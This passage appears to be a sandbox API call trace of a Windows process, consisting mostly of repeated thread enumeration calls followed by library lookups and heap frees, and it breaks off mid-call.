[0236.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.785] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0236.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.057] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.058] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.064] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.071] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.079] CloseHandle (hObject=0x17c) returned 1 [0237.079] OpenThread (dwDesiredAccess=0x100000, bInheritHandle=0, dwThreadId=0x95c) returned 0x17c [0237.079] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0xffffffff) returned 0x0 [0272.004] CloseHandle (hObject=0x17c) returned 1 [0272.005] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0272.019] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.020] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.021] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.022] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.023] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.024] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.025] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.026] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.026] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.031] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.032] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.033] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.034] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.034] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.035] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.036] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.037] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.037] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.038] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.039] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.040] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.040] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.041] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.042] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.043] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.201] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.202] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.205] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.211] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.213] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.214] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.214] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.215] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.216] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.216] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.217] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.217] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.218] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.219] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.219] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.220] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.342] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.343] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.344] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.345] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.346] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.347] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.348] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.349] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.350] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.351] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.352] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.353] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.367] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.368] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.369] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.370] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.371] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.372] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.373] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.374] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.374] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.375] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.376] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.377] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.377] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.378] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.378] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.379] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.380] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.380] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.381] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.393] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.394] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.395] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.396] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.396] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.399] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.540] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.574] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.697] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.698] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.699] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.699] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.700] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.701] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.702] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.702] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.704] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.915] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.916] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.917] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.918] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.919] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.920] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.921] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.922] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.923] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.924] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.925] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.926] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.927] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0272.928] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0274.584] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0274.592] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0274.592] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0274.593] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0274.593] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0274.593] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0274.593] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5870f0 | out: hHeap=0x570000) returned 1 [0274.597] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b5c0 | out: hHeap=0x570000) returned 1 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5798f0 | out: hHeap=0x570000) returned 1 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574fa0 | out: hHeap=0x570000) returned 1 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5805e0 | out: hHeap=0x570000) returned 1 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574fe0 | out: hHeap=0x570000) returned 1 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x579c20 | out: hHeap=0x570000) returned 1 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b890 | out: hHeap=0x570000) returned 1 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573fb0 | out: hHeap=0x570000) returned 1 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b710 | out: hHeap=0x570000) returned 1 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x575020 | out: hHeap=0x570000) returned 1 [0274.597] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x575060 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x574090 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5725f0 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573eb0 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580950 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b3e0 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580450 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573f30 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573f50 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b410 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b980 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57ba20 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b9b0 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57ba60 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x573f70 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57bae0 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578d00 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5882d0 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588790 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x578d20 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b680 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x589160 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b320 | out: hHeap=0x570000) returned 1 [0274.598] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x589260 | out: hHeap=0x570000) returned 1 [0274.599] HeapFree (in: hHeap=0x570000, dwFlags=0x0, 